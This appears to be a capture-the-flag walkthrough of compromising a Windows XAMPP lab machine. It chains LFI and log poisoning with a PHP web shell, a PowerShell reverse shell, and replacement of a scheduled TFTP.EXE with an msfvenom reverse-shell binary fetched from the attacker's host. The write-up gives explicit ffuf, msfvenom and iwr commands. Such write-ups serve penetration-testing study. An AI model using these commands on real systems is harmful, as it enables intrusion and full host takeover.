Target IP: 192.168.197.53
For this machine, enumeration is key.
There are plenty of TCP ports open on the target machine, as shown above.
Performing an aggressive nmap shows the result above. The web application on port 8080 seems interesting.
Port 8080: HTTP
The webpage above is shown for this application. This is the default webpage of the XAMPP installation.
However, browsing to http://192.168.197.53:8080/site/index.php?page=main.php displays the webpage above. The URL is interesting as the parameter page is appended and the web application loads the passed argument. Maybe I can perform LFI/RFI using this parameter?
After some enumeration, I found the parameter page can be used for LFI. I used ffuf with the command ffuf -w /usr/share/wordlists/seclists/Fuzzing/LFI/LFI-gracefulsecurity-windows.txt -u http://192.168.197.53:8080/site/index.php?page=FUZZ -fs 344 | grep "access.log" to find any log files that I could poison, as shown above.
I successfully found c:/xampp/apache/logs/access.log is accessible, as shown above; therefore, I can poison it!
I made a request to the web application and intercepted it using Burpsuite. Then I inserted and deployed my PHP web shell payload at User-Agent header. This was successful as the log file was poisoned. I could perform RCE using it. Time to obtain a reverse shell connection!
Since the target machine is a Windows machine. I used a base64 encoded Powershell reverse shell script. To make sure the payload is valid, I encoded all spaces with %20. Then using the poisoned log file, I deployed my reverse shell script.
And I got a hit! I successfully got a reverse shell connection on my machine at port 8443 with the session as rupert.
There is a Backup directory. Using icacls, I can see the current user has full access over this directory.
The binary TFTP.EXE is executed every five minutes according to the info.txt file.
And I can replace this TFTP.EXE binary with a malicious one as I have Full access.
Using the command msfvenom -p windows/shell_reverse_tcp LHOST=192.168.45.228 LPORT=8443 -f exe -o TFTP.EXE --platform windows, I generated a malicious reverse shell executable file that connects to my machine on port 8443.
On the target machine, I used the command iwr -Uri http://192.168.45.228/TFTP.EXE -Outfile TFTP.EXE to download this malicious file. I made sure to rename the original TFTP.EXE as TFTP.EXE.bak just in case if something goes wrong.
After waiting for some time, I finally got a reverse shell connection on my machine at port 8443. Now I have a shell session as the user administrator. GG.
The local.txt flag is shown above. It is located at Desktop of user rupert.
The proof.txt flag after replacing the TFTP.EXE with my reverse shell executable file to gain a shell with a session as the user administrator. This flag is located at Desktop of user administrator.